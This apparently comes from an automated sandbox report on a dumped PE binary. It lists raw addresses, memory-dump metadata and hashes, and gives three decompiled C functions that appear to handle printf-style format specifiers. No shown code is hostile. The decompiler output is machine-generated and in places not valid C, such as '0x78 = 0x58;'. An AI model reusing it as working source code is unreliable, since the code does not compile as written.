0x6e1aa4a4
0x6e1aa4a7
0x00000000
0x00000000
0x6e1aa4a9
0x00000000
0x6e1aa4a9
0x6e1aa496
0x00000000
0x6e1aa496
0x6e1aa487
0x6e1aa488
0x6e1aa48b
0x00000000
0x00000000
0x00000000
0x6e1aa48b
0x6e1aa44b
0x6e1aa44e
0x6e1aa450
0x6e1aa456
0x6e1aa458
0x6e1aa46a
0x6e1aa46c
0x6e1aa46e
0x6e1aa470
0x6e1aa474
0x6e1aa476
0x6e1aa476
0x00000000
0x6e1aa46e
0x6e1aa45a
0x6e1aa45c
0x6e1aa45c
0x6e1aa45d
0x6e1aa45f
0x6e1aa463
0x00000000
0x6e1aa463
0x6e1aa452
0x00000000
0x6e1aa452
0x6e1aa379
0x00000000
0x6e1aa379
0x6e1aa40d
0x6e1aa40d
0x6e1aa410
0x6e1aa3df
0x6e1aa3df
0x6e1aa3e0
0x6e1aa3e2
0x6e1aa3e4
0x00000000
0x6e1aa3e4
0x6e1aa412
0x6e1aa415
0x00000000
0x00000000
0x6e1aa41b
0x6e1aa382
0x6e1aa382
0x00000000
0x6e1aa382
0x6e1aa3ae
0x6e1aa3f9
0x00000000
0x6e1aa3f9
0x6e1aa3b0
0x6e1aa3b3
0x00000000
0x00000000
0x6e1aa3b5
0x6e1aa3b8
0x6e1aa3eb
0x6e1aa3ed
0x00000000
0x6e1aa3ed
0x6e1aa3ba
0x6e1aa3bd
0x6e1aa3db
0x6e1aa3db
0x6e1aa3db
0x6e1aa3db
0x00000000
0x6e1aa3db
0x6e1aa3bf
0x6e1aa3c2
0x6e1aa3d4
0x00000000
0x6e1aa3d4
0x6e1aa3c4
0x6e1aa3c7
0x00000000
0x00000000
0x6e1aa3cb
0x00000000
0x6e1aa3cb
0x6e1aa33e
0x00000000
0x00000000
0x6e1aa344
0x6e1aa346
0x6e1aa386
0x6e1aa386
0x6e1aa389
0x6e1aa3a2
0x00000000
0x6e1aa3a2
0x6e1aa38b
0x6e1aa38b
0x6e1aa38e
0x00000000
0x00000000
0x6e1aa391
0x6e1aa394
0x00000000
0x00000000
0x6e1aa396
0x6e1aa399
0x00000000
0x6e1aa399
0x6e1aa348
0x6e1aa380
0x00000000
0x6e1aa380
0x6e1aa34c
0x00000000
0x00000000
0x6e1aa355
0x00000000
0x00000000
0x6e1aa35a
0x00000000
0x00000000
0x6e1aa35f
0x00000000
0x00000000
0x6e1aa368
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 6E1AA4AF

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34a7a7c16a8793a3560baa8050a8bdd9abc720f7e5164fef4c236439d3335d4f
Instruction ID: 0569ba127193ed923fdce0cb7bc4b4a694e62f768c6b73f7ae8bd7f9bb78a8cf
Opcode Fuzzy Hash: 34a7a7c16a8793a3560baa8050a8bdd9abc720f7e5164fef4c236439d3335d4f
Instruction Fuzzy Hash: 62619D7C7403069ADB54CEED84B0BBE73A9AF62704F20491EE742DB290D7619DC5B345

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9C63, Relevance: 1.5, Strings: 1, Instructions: 220
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E6E1A9C63(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed int _t55;
				signed char _t57;
				signed char _t59;
				signed int _t60;
				void* _t62;
				signed char _t67;
				signed char _t70;
				signed char _t77;
				signed char _t79;
				signed int _t81;
				signed int _t83;
				signed int _t84;
				unsigned int _t90;
				signed int _t91;
				signed int* _t92;
				void* _t94;
				signed int _t97;
				unsigned int _t99;
				signed char _t101;
				void* _t109;
				intOrPtr _t112;
				void* _t116;
				intOrPtr* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_push(__ecx);
				_t119 = __ecx;
				_t94 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t124 = _t51 - 0x64;
				if(_t124 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E6E1AC1E3(_t119);
							L10:
							if(_t53 != 0) {
								_t54 = E6E1A8AE4(_t119);
								__eflags = _t54;
								if(_t54 != 0) {
									L71:
									_t55 = 1;
									L72:
									return _t55;
								}
								__eflags =  *(_t119 + 0x30);
								if( *(_t119 + 0x30) != 0) {
									goto L71;
								}
								_t97 = 0;
								_v8 = 0;
								_v6 = 0;
								_t90 =  *(_t119 + 0x20);
								_v12 = 0;
								_t57 = _t90 >> 4;
								__eflags = 1 & _t57;
								if((1 & _t57) == 0) {
									L46:
									_t112 =  *((intOrPtr*)(_t119 + 0x31));
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t59 = _t90 >> 5;
										__eflags = _t59 & 0x00000001;
										if((_t59 & 0x00000001) == 0) {
											L50:
											_t91 = 0;
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t60 = 1;
												L55:
												__eflags = _t91;
												if(_t91 != 0) {
													L57:
													 *((char*)(_t121 + _t97 - 4)) = 0x30;
													__eflags = _t112 - 0x58;
													if(_t112 == 0x58) {
														L60:
														0x78 = 0x58;
														L61:
														 *((char*)(_t121 + _t97 - 3)) = 0x78;
														_t97 = _t97 + 2;
														__eflags = _t97;
														_v12 = _t97;
														L62:
														_t92 = _t119 + 0x18;
														_t62 = _t119 + 0x448;
														_t116 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t97;
														__eflags =  *(_t119 + 0x20) & 0x0000000c;
														if(( *(_t119 + 0x20) & 0x0000000c) == 0) {
															E6E1A6E4D(_t62, 0x20, _t116, _t92);
															_t97 = _v12;
															_t122 = _t122 + 0x10;
														}
														_push(_t119 + 0xc);
														E6E1ACF56(_t119 + 0x448,  &_v8, _t97, _t92);
														_t99 =  *(_t119 + 0x20);
														_t67 = _t99 >> 3;
														__eflags = _t67 & 0x00000001;
														if((_t67 & 0x00000001) != 0) {
															_t101 = _t99 >> 2;
															__eflags = _t101 & 0x00000001;
															if((_t101 & 0x00000001) == 0) {
																E6E1A6E4D(_t119 + 0x448, 0x30, _t116, _t92);
																_t122 = _t122 + 0x10;
															}
														}
														E6E1ACCE2(_t92, _t119, _t116, _t119, 0);
														__eflags =  *_t92;
														if( *_t92 >= 0) {
															_t70 =  *(_t119 + 0x20) >> 2;
															__eflags = _t70 & 0x00000001;
															if((_t70 & 0x00000001) != 0) {
																E6E1A6E4D(_t119 + 0x448, 0x20, _t116, _t92);
															}
														}
														goto L71;
													}
													__eflags = _t112 - 0x41;
													if(_t112 == 0x41) {
														goto L60;
													}
													goto L61;
												}
												__eflags = _t60;
												if(_t60 == 0) {
													goto L62;
												}
												goto L57;
											}
											__eflags = _t112 - 0x41;
											if(_t112 == 0x41) {
												goto L54;
											}
											_t60 = 0;
											goto L55;
										}
										_t91 = 1;
										goto L51;
									}
									__eflags = _t112 - 0x58;
									if(_t112 != 0x58) {
										goto L50;
									}
									goto L48;
								}
								_t77 = _t90 >> 6;
								__eflags = 1 & _t77;
								if((1 & _t77) == 0) {
									__eflags = 1 & _t90;
									if((1 & _t90) == 0) {
										_t79 = _t90 >> 1;
										__eflags = 1 & _t79;
										if((1 & _t79) != 0) {
											_v8 = 0x20;
											_t97 = 1;
											_v12 = 1;
										}
										goto L46;
									}
									_v8 = 0x2b;
									L43:
									_t97 = 1;
									_v12 = 1;
									goto L46;
								}
								_v8 = 0x2d;
								goto L43;
							}
							L11:
							_t55 = 0;
							goto L72;
						}
						_t81 = _t52;
						__eflags = _t81;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E6E1ABA99(_t119, _t109, __eflags);
							goto L10;
						}
						__eflags = _t81 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E6E1AC12A(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E6E1AB1EE(0, _t119);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E6E1ABF68(__ecx, _t109);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E6E1AC0B5(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t51 - _t94;
				if(_t125 > 0) {
					_t83 = _t51 - 0x5a;
					__eflags = _t83;
					if(_t83 == 0) {
						_t53 = E6E1AAE95(0, __ecx);
						goto L10;
					}
					_t84 = _t83 - 7;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L30;
					}
					__eflags = _t84;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E6E1AB70F(0, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x6e1a9c68
0x6e1a9c69
0x6e1a9c6c
0x6e1a9c72
0x6e1a9c73
0x6e1a9c77
0x6e1a9c7a
0x6e1a9ce8
0x6e1a9ceb
0x6e1a9d3a
0x6e1a9d3a
0x6e1a9d3d
0x6e1a9ca9
0x6e1a9cab
0x6e1a9cb0
0x6e1a9cb2
0x6e1a9d5a
0x6e1a9d5f
0x6e1a9d61
0x6e1a9e9e
0x6e1a9e9e
0x6e1a9ea0
0x6e1a9ea3
0x6e1a9ea3
0x6e1a9d67
0x6e1a9d6a
0x00000000
0x00000000
0x6e1a9d70
0x6e1a9d72
0x6e1a9d76
0x6e1a9d7b
0x6e1a9d81
0x6e1a9d84
0x6e1a9d87
0x6e1a9d89
0x6e1a9dba
0x6e1a9dba
0x6e1a9dbd
0x6e1a9dc0
0x6e1a9dc7
0x6e1a9dc9
0x6e1a9dcc
0x6e1a9dce
0x6e1a9dd4
0x6e1a9dd4
0x6e1a9dd4
0x6e1a9dd6
0x6e1a9dd6
0x6e1a9dd9
0x6e1a9de4
0x6e1a9de4
0x6e1a9de6
0x6e1a9de6
0x6e1a9de8
0x6e1a9dee
0x6e1a9dee
0x6e1a9df3
0x6e1a9df6
0x6e1a9e01
0x6e1a9e03
0x6e1a9e04
0x6e1a9e04
0x6e1a9e08
0x6e1a9e08
0x6e1a9e0b
0x6e1a9e0e
0x6e1a9e12
0x6e1a9e18
0x6e1a9e1e
0x6e1a9e20
0x6e1a9e24
0x6e1a9e2b
0x6e1a9e30
0x6e1a9e33
0x6e1a9e33
0x6e1a9e39
0x6e1a9e46
0x6e1a9e4b
0x6e1a9e50
0x6e1a9e53
0x6e1a9e55
0x6e1a9e57
0x6e1a9e5a
0x6e1a9e5d
0x6e1a9e6a
0x6e1a9e6f
0x6e1a9e6f
0x6e1a9e5d
0x6e1a9e76
0x6e1a9e7b
0x6e1a9e7e
0x6e1a9e83
0x6e1a9e86
0x6e1a9e88
0x6e1a9e95
0x6e1a9e9a
0x6e1a9e88
0x00000000
0x6e1a9e9d
0x6e1a9df8
0x6e1a9dfb
0x00000000
0x00000000
0x00000000
0x6e1a9dfd
0x6e1a9dea
0x6e1a9dec
0x00000000
0x00000000
0x00000000
0x6e1a9dec
0x6e1a9ddb
0x6e1a9dde
0x00000000
0x00000000
0x6e1a9de0
0x00000000
0x6e1a9de0
0x6e1a9dd0
0x00000000
0x6e1a9dd0
0x6e1a9dc2
0x6e1a9dc5
0x00000000
0x00000000
0x00000000
0x6e1a9dc5
0x6e1a9d8d
0x6e1a9d90
0x6e1a9d92
0x6e1a9d9a
0x6e1a9d9c
0x6e1a9dab
0x6e1a9dad
0x6e1a9daf
0x6e1a9db1
0x6e1a9db5
0x6e1a9db7
0x6e1a9db7
0x00000000
0x6e1a9daf
0x6e1a9d9e
0x6e1a9da2
0x6e1a9da2
0x6e1a9da4
0x00000000
0x6e1a9da4
0x6e1a9d94
0x00000000
0x6e1a9d94
0x6e1a9cb8
0x6e1a9cb8
0x00000000
0x6e1a9cb8
0x6e1a9d44
0x6e1a9d44
0x6e1a9d47
0x6e1a9d19
0x6e1a9d19
0x6e1a9d1a
0x6e1a9d1c
0x6e1a9d1e
0x00000000
0x6e1a9d1e
0x6e1a9d49
0x6e1a9d4c
0x00000000
0x00000000
0x6e1a9d52
0x6e1a9cc1
0x6e1a9cc1
0x00000000
0x6e1a9cc1
0x6e1a9ced
0x6e1a9d30
0x00000000
0x6e1a9d30
0x6e1a9cef
0x6e1a9cf2
0x6e1a9d25
0x6e1a9d27
0x00000000
0x6e1a9d27
0x6e1a9cf4
0x6e1a9cf7
0x6e1a9d15
0x6e1a9d15
0x6e1a9d15
0x6e1a9d15
0x00000000
0x6e1a9d15
0x6e1a9cf9
0x6e1a9cfc
0x6e1a9d0e
0x00000000
0x6e1a9d0e
0x6e1a9cfe
0x6e1a9d01
0x00000000
0x00000000
0x6e1a9d05
0x00000000
0x6e1a9d05
0x6e1a9c7c
0x00000000
0x00000000
0x6e1a9c82
0x6e1a9c84
0x6e1a9cc5
0x6e1a9cc5
0x6e1a9cc8
0x6e1a9ce1
0x00000000
0x6e1a9ce1
0x6e1a9cca
0x6e1a9cca
0x6e1a9ccd
0x00000000
0x00000000
0x6e1a9cd0
0x6e1a9cd3
0x00000000
0x00000000
0x6e1a9cd5
0x6e1a9cd8
0x00000000
0x6e1a9cd8
0x6e1a9c86
0x6e1a9cbf
0x00000000
0x6e1a9cbf
0x6e1a9c8b
0x00000000
0x00000000
0x6e1a9c94
0x00000000
0x00000000
0x6e1a9c99
0x00000000
0x00000000
0x6e1a9c9e
0x00000000
0x00000000
0x6e1a9ca7
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 6E1A9DEE

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b0dfb422fbacc7776f72ff24ca05a85f231112a2a09b82a87c818f89429067ab
Instruction ID: 7bab253fc3cb314915996c00481144de30508423826930b5dd8f9244090f6878
Opcode Fuzzy Hash: b0dfb422fbacc7776f72ff24ca05a85f231112a2a09b82a87c818f89429067ab
Instruction Fuzzy Hash: 9151867C244A495ACB96CAECE4B07FE77E99B23304F60481AC742DB289C61799C4F342

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AA0D6, Relevance: 1.5, Strings: 1, Instructions: 220
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E6E1AA0D6(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed int _t55;
				signed char _t57;
				signed char _t59;
				signed int _t60;
				void* _t62;
				signed char _t67;
				signed char _t70;
				signed char _t77;
				signed char _t79;
				signed int _t81;
				signed int _t83;
				signed int _t84;
				unsigned int _t90;
				signed int _t91;
				signed int* _t92;
				void* _t94;
				signed int _t97;
				unsigned int _t99;
				signed char _t101;
				void* _t109;
				intOrPtr _t112;
				void* _t116;
				intOrPtr* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_push(__ecx);
				_t119 = __ecx;
				_t94 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t124 = _t51 - 0x64;
				if(_t124 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E6E1AC1E3(_t119);
							L10:
							if(_t53 != 0) {
								_t54 = E6E1A8AE4(_t119);
								__eflags = _t54;
								if(_t54 != 0) {
									L71:
									_t55 = 1;
									L72:
									return _t55;
								}
								__eflags =  *(_t119 + 0x30);
								if( *(_t119 + 0x30) != 0) {
									goto L71;
								}
								_t97 = 0;
								_v8 = 0;
								_v6 = 0;
								_t90 =  *(_t119 + 0x20);
								_v12 = 0;
								_t57 = _t90 >> 4;
								__eflags = 1 & _t57;
								if((1 & _t57) == 0) {
									L46:
									_t112 =  *((intOrPtr*)(_t119 + 0x31));
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t59 = _t90 >> 5;
										__eflags = _t59 & 0x00000001;
										if((_t59 & 0x00000001) == 0) {
											L50:
											_t91 = 0;
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t60 = 1;
												L55:
												__eflags = _t91;
												if(_t91 != 0) {
													L57:
													 *((char*)(_t121 + _t97 - 4)) = 0x30;
													__eflags = _t112 - 0x58;
													if(_t112 == 0x58) {
														L60:
														0x78 = 0x58;
														L61:
														 *((char*)(_t121 + _t97 - 3)) = 0x78;
														_t97 = _t97 + 2;
														__eflags = _t97;
														_v12 = _t97;
														L62:
														_t92 = _t119 + 0x18;
														_t62 = _t119 + 0x448;
														_t116 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t97;
														__eflags =  *(_t119 + 0x20) & 0x0000000c;
														if(( *(_t119 + 0x20) & 0x0000000c) == 0) {
															E6E1A6EC8(_t62, 0x20, _t116, _t92);
															_t97 = _v12;
															_t122 = _t122 + 0x10;
														}
														_push(_t119 + 0xc);
														E6E1ACFAE(_t119 + 0x448,  &_v8, _t97, _t92);
														_t99 =  *(_t119 + 0x20);
														_t67 = _t99 >> 3;
														__eflags = _t67 & 0x00000001;
														if((_t67 & 0x00000001) != 0) {
															_t101 = _t99 >> 2;
															__eflags = _t101 & 0x00000001;
															if((_t101 & 0x00000001) == 0) {
																E6E1A6EC8(_t119 + 0x448, 0x30, _t116, _t92);
																_t122 = _t122 + 0x10;
															}
														}
														E6E1ACD89(_t92, _t119, _t116, _t119, 0);
														__eflags =  *_t92;
														if( *_t92 >= 0) {
															_t70 =  *(_t119 + 0x20) >> 2;
															__eflags = _t70 & 0x00000001;
															if((_t70 & 0x00000001) != 0) {
																E6E1A6EC8(_t119 + 0x448, 0x20, _t116, _t92);
															}
														}
														goto L71;
													}
													__eflags = _t112 - 0x41;
													if(_t112 == 0x41) {
														goto L60;
													}
													goto L61;
												}
												__eflags = _t60;
												if(_t60 == 0) {
													goto L62;
												}
												goto L57;
											}
											__eflags = _t112 - 0x41;
											if(_t112 == 0x41) {
												goto L54;
											}
											_t60 = 0;
											goto L55;
										}
										_t91 = 1;
										goto L51;
									}
									__eflags = _t112 - 0x58;
									if(_t112 != 0x58) {
										goto L50;
									}
									goto L48;
								}
								_t77 = _t90 >> 6;
								__eflags = 1 & _t77;
								if((1 & _t77) == 0) {
									__eflags = 1 & _t90;
									if((1 & _t90) == 0) {
										_t79 = _t90 >> 1;
										__eflags = 1 & _t79;
										if((1 & _t79) != 0) {
											_v8 = 0x20;
											_t97 = 1;
											_v12 = 1;
										}
										goto L46;
									}
									_v8 = 0x2b;
									L43:
									_t97 = 1;
									_v12 = 1;
									goto L46;
								}
								_v8 = 0x2d;
								goto L43;
							}
							L11:
							_t55 = 0;
							goto L72;
						}
						_t81 = _t52;
						__eflags = _t81;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E6E1ABA99(_t119, _t109, __eflags);
							goto L10;
						}
						__eflags = _t81 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E6E1AC12A(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E6E1AB1EE(0, _t119);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E6E1ABF68(__ecx, _t109);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E6E1AC0B5(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t51 - _t94;
				if(_t125 > 0) {
					_t83 = _t51 - 0x5a;
					__eflags = _t83;
					if(_t83 == 0) {
						_t53 = E6E1AAE95(0, __ecx);
						goto L10;
					}
					_t84 = _t83 - 7;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L30;
					}
					__eflags = _t84;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E6E1AB70F(0, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x6e1aa0db
0x6e1aa0dc
0x6e1aa0df
0x6e1aa0e5
0x6e1aa0e6
0x6e1aa0ea
0x6e1aa0ed
0x6e1aa15b
0x6e1aa15e
0x6e1aa1ad
0x6e1aa1ad
0x6e1aa1b0
0x6e1aa11c
0x6e1aa11e
0x6e1aa123
0x6e1aa125
0x6e1aa1cd
0x6e1aa1d2
0x6e1aa1d4
0x6e1aa311
0x6e1aa311
0x6e1aa313
0x6e1aa316
0x6e1aa316
0x6e1aa1da
0x6e1aa1dd
0x00000000
0x00000000
0x6e1aa1e3
0x6e1aa1e5
0x6e1aa1e9
0x6e1aa1ee
0x6e1aa1f4
0x6e1aa1f7
0x6e1aa1fa
0x6e1aa1fc
0x6e1aa22d
0x6e1aa22d
0x6e1aa230
0x6e1aa233
0x6e1aa23a
0x6e1aa23c
0x6e1aa23f
0x6e1aa241
0x6e1aa247
0x6e1aa247
0x6e1aa247
0x6e1aa249
0x6e1aa249
0x6e1aa24c
0x6e1aa257
0x6e1aa257
0x6e1aa259
0x6e1aa259
0x6e1aa25b
0x6e1aa261
0x6e1aa261
0x6e1aa266
0x6e1aa269
0x6e1aa274
0x6e1aa276
0x6e1aa277
0x6e1aa277
0x6e1aa27b
0x6e1aa27b
0x6e1aa27e
0x6e1aa281
0x6e1aa285
0x6e1aa28b
0x6e1aa291
0x6e1aa293
0x6e1aa297
0x6e1aa29e
0x6e1aa2a3
0x6e1aa2a6
0x6e1aa2a6
0x6e1aa2ac
0x6e1aa2b9
0x6e1aa2be
0x6e1aa2c3
0x6e1aa2c6
0x6e1aa2c8
0x6e1aa2ca
0x6e1aa2cd
0x6e1aa2d0
0x6e1aa2dd
0x6e1aa2e2
0x6e1aa2e2
0x6e1aa2d0
0x6e1aa2e9
0x6e1aa2ee
0x6e1aa2f1
0x6e1aa2f6
0x6e1aa2f9
0x6e1aa2fb
0x6e1aa308
0x6e1aa30d
0x6e1aa2fb
0x00000000
0x6e1aa310
0x6e1aa26b
0x6e1aa26e
0x00000000
0x00000000
0x00000000
0x6e1aa270
0x6e1aa25d
0x6e1aa25f
0x00000000
0x00000000
0x00000000
0x6e1aa25f
0x6e1aa24e
0x6e1aa251
0x00000000
0x00000000
0x6e1aa253
0x00000000
0x6e1aa253
0x6e1aa243
0x00000000
0x6e1aa243
0x6e1aa235
0x6e1aa238
0x00000000
0x00000000
0x00000000
0x6e1aa238
0x6e1aa200
0x6e1aa203
0x6e1aa205
0x6e1aa20d
0x6e1aa20f
0x6e1aa21e
0x6e1aa220
0x6e1aa222
0x6e1aa224
0x6e1aa228
0x6e1aa22a
0x6e1aa22a
0x00000000
0x6e1aa222
0x6e1aa211
0x6e1aa215
0x6e1aa215
0x6e1aa217
0x00000000
0x6e1aa217
0x6e1aa207
0x00000000
0x6e1aa207
0x6e1aa12b
0x6e1aa12b
0x00000000
0x6e1aa12b
0x6e1aa1b7
0x6e1aa1b7
0x6e1aa1ba
0x6e1aa18c
0x6e1aa18c
0x6e1aa18d
0x6e1aa18f
0x6e1aa191
0x00000000
0x6e1aa191
0x6e1aa1bc
0x6e1aa1bf
0x00000000
0x00000000
0x6e1aa1c5
0x6e1aa134
0x6e1aa134
0x00000000
0x6e1aa134
0x6e1aa160
0x6e1aa1a3
0x00000000
0x6e1aa1a3
0x6e1aa162
0x6e1aa165
0x6e1aa198
0x6e1aa19a
0x00000000
0x6e1aa19a
0x6e1aa167
0x6e1aa16a
0x6e1aa188
0x6e1aa188
0x6e1aa188
0x6e1aa188
0x00000000
0x6e1aa188
0x6e1aa16c
0x6e1aa16f
0x6e1aa181
0x00000000
0x6e1aa181
0x6e1aa171
0x6e1aa174
0x00000000
0x00000000
0x6e1aa178
0x00000000
0x6e1aa178
0x6e1aa0ef
0x00000000
0x00000000
0x6e1aa0f5
0x6e1aa0f7
0x6e1aa138
0x6e1aa138
0x6e1aa13b
0x6e1aa154
0x00000000
0x6e1aa154
0x6e1aa13d
0x6e1aa13d
0x6e1aa140
0x00000000
0x00000000
0x6e1aa143
0x6e1aa146
0x00000000
0x00000000
0x6e1aa148
0x6e1aa14b
0x00000000
0x6e1aa14b
0x6e1aa0f9
0x6e1aa132
0x00000000
0x6e1aa132
0x6e1aa0fe
0x00000000
0x00000000
0x6e1aa107
0x00000000
0x00000000
0x6e1aa10c
0x00000000
0x00000000
0x6e1aa111
0x00000000
0x00000000
0x6e1aa11a
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 6E1AA261

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d7f64f4a316d6ef573d8bbbdff8a44cd70fdef9f9588c30a9d44f51686b81e51
Instruction ID: 418ec4b92592afb7b319296233c0b09c1fb156c024141ef752c3c6f4fe20a0b2
Opcode Fuzzy Hash: d7f64f4a316d6ef573d8bbbdff8a44cd70fdef9f9588c30a9d44f51686b81e51
Instruction Fuzzy Hash: 9D517F7C64474A7ADF9489EC88A07FE77AA9B22304F200D2FD752D7281C726D9C9B251

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9EA4, Relevance: 1.5, Strings: 1, Instructions: 216
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E6E1A9EA4(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed char _t56;
				signed char _t58;
				signed int _t59;
				void* _t61;
				signed char _t66;
				signed char _t69;
				signed char _t76;
				signed char _t78;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				unsigned int _t89;
				signed int _t90;
				signed int* _t91;
				void* _t93;
				signed int _t95;
				unsigned int _t97;
				signed char _t99;
				void* _t107;
				intOrPtr _t110;
				void* _t114;
				intOrPtr* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t117 = __ecx;
				_t93 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t122 = _t51 - 0x64;
				if(_t122 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E6E1AC172(_t117);
							L10:
							if(_t53 != 0) {
								__eflags =  *(_t117 + 0x30);
								if( *(_t117 + 0x30) != 0) {
									L70:
									_t54 = 1;
									L71:
									return _t54;
								}
								_t95 = 0;
								_v8 = 0;
								_v6 = 0;
								_t89 =  *(_t117 + 0x20);
								_v12 = 0;
								_t56 = _t89 >> 4;
								__eflags = 1 & _t56;
								if((1 & _t56) == 0) {
									L45:
									_t110 =  *((intOrPtr*)(_t117 + 0x31));
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L47:
										_t58 = _t89 >> 5;
										__eflags = _t58 & 0x00000001;
